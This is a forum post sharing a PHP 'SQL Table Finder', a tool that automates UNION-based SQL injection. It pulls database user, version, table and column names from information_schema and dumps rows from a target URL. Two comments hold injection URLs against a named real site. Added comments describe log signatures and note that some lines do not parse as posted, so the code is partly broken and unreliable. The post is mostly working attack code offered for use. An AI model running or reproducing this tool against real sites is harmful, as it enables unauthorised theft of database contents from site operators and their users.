
SQL Table Finder



Post  Dante Mon 29 Nov 2010 - 10:17

SQL Table Finder

SQL Table Finder, save it with a .php extension

Code:
<?php
// Prologue: reads the three form fields and sets the constants the rest of
// the script splices into outbound requests. Nothing here validates input.
set_time_limit(0);
// Silences every warning/notice, including undefined $_POST keys below and
// any cURL or preg_* failures later in the script.
error_reporting(0);
// Request values are used verbatim: $url is spliced into outbound requests
// and echoed back into the form markup unescaped (reflected XSS on this
// page itself); $tbl and $col are concatenated into request strings.
$url = $_POST['url'];
$tbl = $_POST['tbl'];
$col = $_POST['col'];
// Hex literal of the ASCII string "gblack"; it brackets every extracted value
// so the response can be regex-matched. Defender note: this constant and the
// UNHEX(HEX(CONCAT( wrapper appear verbatim in the query string of every
// request this tool makes - a high-confidence WAF / access-log signature.
$by = "0x67626C61636B";
// Literal "+" used as the whitespace separator in the built URL.
$spasi = "+";
// Trailing comment marker appended to every built request.
$end = "--";
$action = $_POST['action'];
?>
<html>
<head>      
<title></title>
<style>
body{
   color: silver;
   background-color: #333;
   font-family: "Courier New";
   font-size: 11px;
}
input {
   color: silver;
   background-color: #333;
   font-family: "Courier New";
   font-size: 11px;
   border: silver 1px solid;
}
a{
   text-decoration:none;
   color: silver;
   font-family: "Courier New";
   font-size: 11px;
}
a:hover{
   text-decoration:underline;
   color: #00ff00;
   font-family: "Courier New";
   font-size: 11px;
}
</style>
</head>
<body>
<!-- Three forms post back to this same script; the hidden "action" field
     selects the branch that runs. $url and $tbl are printed straight into
     value="" attributes without htmlspecialchars(), so a crafted POST to
     this page reflects arbitrary markup (XSS in the tool's own UI). -->
<form method="POST" action="" name="gettbl">
   <input type="hidden" name="action" value="gettbl">
   <input type="text" name="url" id="url" size="90" value="<?php print $url; ?>">
   <input type="submit" value="Get Tables">
</form>
<!-- The "getcol" form's tbl field is filled by the onClick handlers that the
     gettbl branch emits; the same id="url"/id="tbl" is reused across forms. -->
<form method="POST" action="" name="getcol">
   <input type="hidden" name="action" value="getcol">
   <input type="text" name="url" id="url" size="90" value="<?php print $url; ?>">
   <input type="text" name="tbl" id="tbl" size="20" value="">
   <input type="submit" value="Get Columns">
</form>
<form method="POST" action="" name="dump">
   <input type="hidden" name="action" value="dump">
   <input type="text" name="url" id="url" size="90" value="<?php print $url; ?>">
   <input type="text" name="tbl" id="tbl" size="20" value="<?php print $tbl; ?>"><br>
   <input type="text" name="col" id="col" size="90" value="">
   <input type="submit" value="Dump">
</form>
<?php
// Dispatch on the hidden "action" field of whichever form was submitted.
// Every branch rewrites the caller-supplied $url (which must contain the
// literal placeholder "gblack") and then issues one HTTP request per item,
// so a single run produces a burst of near-identical requests that differ
// only in the trailing "limit N,1" offset. That burst, plus the fixed
// hex marker in $by, is the pattern to alert on server-side.
if($action == "gettbl") {
   if($url){
      print "<pre>[+] Gathering database configuration...\r\n\r\n-------------------------------------------------------\r\n";
      // The placeholder is replaced by an expression whose output is wrapped
      // in the $by marker on both sides; $end is appended afterwards.
      $getinfo = str_replace("gblack", "UNHEX(HEX(CONCAT(".$by.",CONCAT_WS(0x3a,user(),version(),database()),".$by.")))", $url);
      $getinfo.= $end;
      $info = FetchURL($getinfo);
      // Value is recovered from between the two markers in the raw response
      // (headers included - see FetchURL). Case-insensitive, non-greedy.
      if (preg_match("/gblack(.*?)gblack/i", $info, $cocok))  {
         // $cocok[1] is "user:version:database" joined by 0x3a (':').
         $det = preg_split("/:/", $cocok[1]);
         print "User\t: ".$det[0]."\r\n";
         print "Version\t: ".$det[1]."\r\n";
         print "Database: ".$det[2]."\r\n-------------------------------------------------------\r\n\r\n";
         flush();
      }
      // $det is only assigned inside the branch above; when the match fails
      // this reads an undefined variable (hidden by error_reporting(0)) and
      // the script falls through to the "Can't work" message below.
      $ver = explode(".", $det[1]);
      //print_r($ver);
      if($ver[0] == "5") {
         // http://www.coolercode.com/myspace_layouts/myspace_layout.php?cat_id=44+AND+1=0+UNION+SELECT+1,2,group_concat(table_name),4,5,6,7,8,9,10,11+from+information_schema.tables+where+table_schema=database()--
         // http://www.coolercode.com/myspace_layouts/myspace_layout.php?cat_id=44+AND+1=0+UNION+SELECT+1,2,gblack,4,5,6,7,8,9,10,11--
         $counttable = str_replace("gblack", "UNHEX(HEX(CONCAT(".$by.",COUNT(table_name),".$by.")))", $url);
         $counttable.= $spasi."from".$spasi."information_schema.tables".$spasi."where".$spasi."table_schema=database()".$end;
         $tablecount = FetchURL($counttable);
         if (preg_match("/gblack(.*?)gblack/i", $tablecount, $cocok))  {
            $jumtable = $cocok[1];
            print "[+] There are ".$jumtable." tables in '".$det[2]."' database...\r\n\r\n-------------------------------------------------------\r\n";
            flush();
            
         }
         // Inclusive bound: the loop runs $jumtable + 1 times, i.e. one request
         // past the reported count. If the count match failed, $jumtable is
         // undefined and the loop runs exactly once.
         for($x=0;$x<=$jumtable;$x++) {
            $dumptable = str_replace("gblack", "UNHEX(HEX(CONCAT(".$by.",table_name,".$by.")))", $url);
            $dumptable.= $spasi."from".$spasi."information_schema.tables".$spasi."where".$spasi."table_schema=database()".$spasi."limit".$spasi.$x.",1".$end;
            $tabledump = FetchURL($dumptable);
            if (preg_match("/gblack(.*?)gblack/i", $tabledump, $cocok))  {
               // NOTE: as posted this line does not parse - the unescaped "#"
               // closes the string literal and starts a PHP line comment.
               // The matched value is also emitted into HTML/JS unescaped.
               print "<a id=".$cocok[1]." href="#" onClick="document.getcol.tbl.value='".$cocok[1]."'">".$cocok[1]."</a>\r\n";
               flush();
            }
            flush();
         }
      } else {
         print "Can't work on this version!\r\n";
      }
   }
   print "-------------------------------------------------------\r\n</pre>";
} elseif ($action == "getcol") {
   if($url){
      print "<pre>";
      // Here $tbl is hex-encoded with bin2hex() before being spliced in;
      // the "dump" branch below concatenates $tbl and $col raw instead.
      $countcol = str_replace("gblack", "UNHEX(HEX(CONCAT(".$by.",COUNT(column_name),".$by.")))", $url);
      $countcol.= $spasi."from".$spasi."information_schema.columns".$spasi."where".$spasi."table_name=0x".bin2hex($tbl).$end;
      //print $countcol;
      $colcount = FetchURL($countcol);
      if (preg_match("/gblack(.*?)gblack/i", $colcount, $cocok))  {
         $jumcol = $cocok[1];
         print "[+] There are ".$jumcol." columns in '".$tbl."' table...\r\n\r\n-------------------------------------------------------\r\n";
         flush();
         
      }
      // Same inclusive-bound / undefined-count behaviour as the gettbl loop.
      for($x=0;$x<=$jumcol;$x++) {
         $dumpcol = str_replace("gblack", "UNHEX(HEX(CONCAT(".$by.",column_name,".$by.")))", $url);
         $dumpcol.= $spasi."from".$spasi."information_schema.columns".$spasi."where".$spasi."table_name=0x".bin2hex($tbl).$spasi."limit".$spasi.$x.",1".$end;
         $coldump = FetchURL($dumpcol);
         if (preg_match("/gblack(.*?)gblack/i", $coldump, $cocok))  {
            // NOTE: same unescaped "#" problem as the gettbl branch - this
            // line does not parse as posted.
            print "<a id=".$cocok[1]." href="#" onClick="document.dump.col.value=dump.col.value+',".$cocok[1]."'">".$cocok[1]."</a>\r\n";
            flush();
         }
         flush();
      }
      
   } else {
      print "Error!";
   }
   print "-------------------------------------------------------\r\n</pre>";
} elseif ($action == "dump") {
   if($url){
      print "<pre>";
      // $tbl is concatenated raw here (no bin2hex, unlike getcol).
      $countdata = str_replace("gblack", "UNHEX(HEX(CONCAT(".$by.",COUNT(*),".$by.")))", $url);
      $countdata.= $spasi."from".$spasi.$tbl.$end;
      $datacount = FetchURL($countdata);
      if (preg_match("/gblack(.*?)gblack/i", $datacount, $cocok))  {
         $jumdata = $cocok[1];
         print "[+] There are ".$jumdata." rows to dump from '".$col."' column(s)...\r\n\r\n-------------------------------------------------------\r\n";
         flush();
         
      }
      // One request per row; $col is interpolated raw inside the double-quoted
      // string. Inclusive bound again: rows + 1 requests.
      for($x=0;$x<=$jumdata;$x++) {
         $dumpdata = str_replace("gblack", "UNHEX(HEX(CONCAT(".$by.",CONCAT_WS(0x3a,$col),".$by.")))", $url);
         $dumpdata.= $spasi."from".$spasi.$tbl.$spasi."limit".$spasi.$x.",1".$end;
         $datadump = FetchURL($dumpdata);
         //print $dumpdata;
         if (preg_match("/gblack(.*?)gblack/i", $datadump, $cocok))  {
            // Matched value is printed into the <pre> block unescaped.
            print "[".$x."] ".$cocok[1]."\r\n";
            flush();
         }
         flush();
      }
      
   } else {
      print "Error!";
   }
   print "-------------------------------------------------------\r\n</pre>";
}
// Issue a single GET for $url and return the raw response, or false on
// failure.
//
// $url    - fully built request URL (no further encoding is applied here).
// Returns - string containing response headers AND body (CURLOPT_HEADER is
//           on), or false. Because the check is "!$data", an empty body or
//           the literal string "0" is also reported as failure.
function FetchURL($url) {
   $ch = curl_init();
   // Hard-coded, dated Firefox 2.0.0.20 user agent, identical on every
   // request - together with the fixed query-string markers this makes the
   // traffic straightforward to fingerprint in access logs.
   curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/3.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.20) Gecko/20081217 Firefox/2.0.0.20 (.NET CLR 3.5.30729)");
   // Redirects are followed automatically (no hop limit set).
   curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
   // Headers are prepended to the returned string; callers' regexes run over
   // headers and body alike.
   curl_setopt($ch, CURLOPT_HEADER, 1);
   curl_setopt($ch, CURLOPT_URL, $url);
   curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
   // 30 s cap per request; set_time_limit(0) at the top removes the
   // script-level cap, so a long run is bounded only by the remote side.
   curl_setopt($ch, CURLOPT_TIMEOUT, 30);
   $data = curl_exec($ch);
   // The handle is never released with curl_close(); it lives until the
   // script ends (one leaked handle per call).
   if(!$data) {
      return false;
   }
   return $data;
}
?>
</body>
</html>

Tester in [You must be registered and logged in to see this link.]




 